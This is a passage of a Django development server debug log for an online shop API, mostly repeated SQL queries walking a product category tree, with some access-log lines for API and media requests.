(0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 22:47:14,001 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 22:47:14,003 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 22:47:14,005 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 22:47:14,008 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 22:47:14,010 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 22:47:14,013 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 22:47:14,016 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 22:47:14,019 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 22:47:14,021 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 22:47:14,024 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 22:47:14,027 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 22:47:14] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [31/Dec/2019 22:47:14] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 22:47:15,466 utils 2749 140297243715328 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 22:47:15,477 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 22:47:15,483 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 22:47:15,487 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 22:47:15,493 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 22:47:15,497 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 22:47:15,501 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 22:47:15,505 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 22:47:15,509 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 22:47:15,515 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 22:47:15,519 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 22:47:15,523 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 22:47:15,527 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 22:47:15,536 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 22:47:15,542 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 22:47:15,546 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 22:47:15,550 utils 2749 140297233225472 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-31 22:47:15,555 utils 2749 140297243715328 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 22:47:15,560 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 22:47:15,564 utils 2749 140297233225472 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 22:47:15,567 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 22:47:15,575 utils 2749 140297243715328 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) [31/Dec/2019 22:47:15] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-31 22:47:15,579 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 22:47:15,584 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 22:47:15,588 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 22:47:15,592 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 22:47:15,596 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 22:47:15,601 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 22:47:15,605 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 22:47:15,609 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 22:47:15,613 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 22:47:15,617 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 22:47:15,623 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 22:47:15,629 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 22:47:15,634 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 22:47:15,637 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 22:47:15,641 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 22:47:15,649 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 22:47:15,653 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 22:47:15,656 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 22:47:15,660 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 22:47:15,667 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 22:47:15,671 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 22:47:15,676 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 22:47:15,680 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 22:47:15,685 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 22:47:15,692 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 22:47:15,696 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 22:47:15] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-31 22:47:18,538 utils 2749 140297243715328 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-31 22:47:18,544 utils 2749 140297243715328 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [31/Dec/2019 22:47:18] "GET /api/v1/fire/ HTTP/1.0" 200 482 [31/Dec/2019 22:47:18] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 200 3039441 [31/Dec/2019 22:47:18] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 200 355854 [31/Dec/2019 22:47:18] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 DEBUG 2019-12-31 22:47:56,141 utils 2749 140297233225472 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 22:47:56,152 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 22:47:56,158 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 22:47:56,163 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 22:47:56,169 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", 